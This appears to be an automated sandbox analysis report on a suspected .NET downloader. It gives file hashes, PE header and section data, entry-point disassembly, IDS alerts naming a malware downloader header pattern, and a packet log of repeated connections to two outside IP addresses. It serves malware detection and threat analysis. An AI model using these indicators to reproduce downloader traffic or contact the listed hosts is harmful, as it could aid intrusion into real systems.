                                                                                                            SSDEEP:12288:nrOm+Ri3AgFdiFJ02txMwyv75ykUeobZ+G8uRGYK9dQLtVd+8hbi7E078mDX:SQ3AgQJHtxzPkrob827UQr/QE078mDX
                                                                                                            TLSH:C7F4239AB3810832E47F01F4985251986338FCC99F15CA5C888D15AE9F73B99CE967F3
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P=g..............0...... ........... ... ....@.. .......................`............`................................
                                                                                                            Icon Hash:8bdb4b414d656d61
                                                                                                            Entrypoint:0x4c02e6
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x673D50B2 [Wed Nov 20 03:00:02 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc02940x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x1d7c.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xbe2ec0xbe400776961d7b579d7085e1a528b36bc0eebFalse0.9610427274967148data7.944191004977694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xc20000x1d7c0x1e00a9a9c1daa7c967a7239e210098d25ed8False0.8063802083333333data7.32253389530533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xc40000xc0x20039a3bf7a51036de48ab151b1e8dca785False0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xc21000x1733PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9151372284896447
                                                                                                            RT_GROUP_ICON0xc38440x14data1.05
                                                                                                            RT_VERSION0xc38680x314data0.4352791878172589
                                                                                                            RT_MANIFEST0xc3b8c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-20T09:33:05.413269+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708158.101.44.24280TCP
                                                                                                            2024-11-20T09:33:06.616399+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708158.101.44.24280TCP
                                                                                                            2024-11-20T09:33:07.122710+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549710188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:07.803913+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549712158.101.44.24280TCP
                                                                                                            2024-11-20T09:33:10.225779+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549717158.101.44.24280TCP
                                                                                                            2024-11-20T09:33:11.194526+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549717158.101.44.24280TCP
                                                                                                            2024-11-20T09:33:11.760095+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549722188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:12.382036+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549724158.101.44.24280TCP
                                                                                                            2024-11-20T09:33:13.280365+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549727188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:15.367632+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549734188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:15.821025+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549735188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:17.792972+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549740188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:19.152668+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549745188.114.96.3443TCP
                                                                                                            2024-11-20T09:33:20.453006+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549760188.114.96.3443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 20, 2024 09:33:04.629689932 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:04.635080099 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:04.635170937 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:04.635445118 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:04.640367031 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.200486898 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.207741976 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:05.215409040 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.363385916 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.413269043 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:05.446562052 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:05.446650028 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.446743011 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:05.452743053 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:05.452771902 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.924583912 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.924674988 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:05.929588079 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:05.929617882 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.930181980 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.116399050 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.221272945 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.267338991 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.327519894 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.327613115 CET44349709188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.327732086 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.334332943 CET49709443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.344805002 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:06.353038073 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.502743959 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.511845112 CET49710443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.511888027 CET44349710188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.511948109 CET49710443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.512264967 CET49710443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.512281895 CET44349710188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.616399050 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:06.987215996 CET44349710188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:06.990252972 CET49710443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:06.990272999 CET44349710188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.122685909 CET44349710188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.122745991 CET44349710188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.122831106 CET49710443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:07.124629021 CET49710443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:07.129754066 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:07.131047964 CET4971280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:07.135059118 CET8049708158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.135140896 CET4970880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:07.136010885 CET8049712158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.136102915 CET4971280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:07.136194944 CET4971280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:07.141104937 CET8049712158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.719619989 CET8049712158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.721000910 CET49714443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:07.721105099 CET44349714188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.721245050 CET49714443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:07.721510887 CET49714443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:07.721546888 CET44349714188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:07.803913116 CET4971280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:08.205955029 CET44349714188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.207910061 CET49714443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:08.207983017 CET44349714188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.368762016 CET44349714188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.368828058 CET44349714188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.368913889 CET49714443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:08.369318962 CET49714443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:08.374795914 CET4971580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:08.383630991 CET8049715158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.383769035 CET4971580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:08.383829117 CET4971580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:08.392853022 CET8049715158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.983076096 CET8049715158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.984455109 CET49716443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:08.984540939 CET44349716188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:08.984633923 CET49716443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:08.984893084 CET49716443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:08.984925032 CET44349716188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.038275003 CET4971580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.424849033 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.431904078 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.431998968 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.432219028 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.437232971 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.457530975 CET44349716188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.459427118 CET49716443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:09.459517002 CET44349716188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.605206966 CET44349716188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.605289936 CET44349716188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.605609894 CET49716443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:09.605741978 CET49716443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:09.609369993 CET4971580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.610357046 CET4971880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.614516973 CET8049715158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.614757061 CET4971580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.615288973 CET8049718158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:09.615381002 CET4971880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.615515947 CET4971880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:09.620384932 CET8049718158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.016171932 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.019756079 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.024643898 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.177064896 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.178440094 CET8049718158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.180437088 CET49719443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.180490971 CET44349719188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.180587053 CET49719443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.180850029 CET49719443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.180871010 CET44349719188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.215430021 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.215483904 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.215559959 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.219661951 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.219706059 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.225768089 CET4971880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.225779057 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.654916048 CET44349719188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.656754971 CET49719443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.656775951 CET44349719188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.694224119 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.694307089 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.696271896 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.696285009 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.696693897 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.741403103 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.804095984 CET44349719188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.804275036 CET44349719188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.804343939 CET49719443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.804826975 CET49719443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.809361935 CET4971880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.809953928 CET4972180192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.814591885 CET8049718158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.814659119 CET4971880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.815289021 CET8049721158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.815352917 CET4972180192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.815464020 CET4972180192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.820328951 CET8049721158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.868866920 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.911334038 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.980528116 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.981136084 CET44349720188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:10.981228113 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.984064102 CET49720443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:10.987672091 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:10.995872021 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.148333073 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.150279045 CET49722443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.150326967 CET44349722188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.150619984 CET49722443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.150902987 CET49722443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.150924921 CET44349722188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.194525957 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.378704071 CET8049721158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.380004883 CET49723443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.380076885 CET44349723188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.380158901 CET49723443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.380402088 CET49723443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.380428076 CET44349723188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.428992033 CET4972180192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.616167068 CET44349722188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.618515968 CET49722443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.618556023 CET44349722188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.760162115 CET44349722188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.760327101 CET44349722188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.760654926 CET49722443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.760958910 CET49722443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.764605999 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.765531063 CET4972480192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.770905972 CET8049717158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.770983934 CET4971780192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.771783113 CET8049724158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.771877050 CET4972480192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.772047997 CET4972480192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:11.778284073 CET8049724158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.860171080 CET44349723188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:11.862025023 CET49723443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:11.862060070 CET44349723188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.012434006 CET44349723188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.012598991 CET44349723188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.012665033 CET49723443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.012926102 CET49723443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.017555952 CET4972180192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.018260002 CET4972580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.023302078 CET8049721158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.023365021 CET4972180192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.023901939 CET8049725158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.024071932 CET4972580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.024102926 CET4972580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.029822111 CET8049725158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.335205078 CET8049724158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.336596012 CET49726443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.336700916 CET44349726188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.336788893 CET49726443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.337038040 CET49726443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.337088108 CET44349726188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.382035971 CET4972480192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.600101948 CET8049725158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.642879009 CET49727443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.642937899 CET44349727188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.643171072 CET49727443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.645292997 CET49727443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.645311117 CET44349727188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.647649050 CET4972580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.798669100 CET44349726188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.830806971 CET49726443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.830871105 CET44349726188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.944490910 CET44349726188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.944578886 CET44349726188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.944636106 CET49726443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.945468903 CET49726443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:12.951634884 CET4972880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.956825972 CET8049728158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:12.956947088 CET4972880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:12.957039118 CET4972880192.168.2.5158.101.44.242
